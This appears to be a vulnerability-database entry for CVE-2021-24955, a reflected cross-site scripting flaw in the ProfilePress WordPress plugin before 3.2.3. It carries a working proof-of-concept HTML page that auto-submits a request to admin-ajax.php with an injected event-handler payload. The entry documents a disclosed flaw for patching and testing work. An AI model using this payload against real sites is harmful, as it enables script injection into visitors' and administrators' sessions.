Lucene search

K

ProfilePress < 3.2.3 - Reflected Cross-Site Scripting

🗓️ 15 Nov 2021 00:00:00Reported by JrXnmType 
wpexploit
 wpexploit
👁 86 Views

ProfilePress < 3.2.3 - Reflected Cross-Site Scripting on form submissio

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
WPVulnDB
ProfilePress < 3.2.3 - Reflected Cross-Site Scripting
15 Nov 202100:00
wpvulndb
CVE
CVE-2021-24955
13 Dec 202111:15
cve
Prion
Cross site scripting
13 Dec 202111:15
prion
Cvelist
CVE-2021-24955 ProfilePress < 3.2.3 - Reflected Cross-Site Scripting
13 Dec 202110:41
cvelist
NVD
CVE-2021-24955
13 Dec 202111:15
nvd
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="pp_get_forms_by_builder_type" />
      <input type="hidden" name="data" value='" onmouseover=alert(/XSS/) style=display:block;height:1000px;width:1000px; t="' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Nov 2021 00:00Current
5.9Medium risk
Vulners AI Score5.9
EPSS0.001
86
.json
Report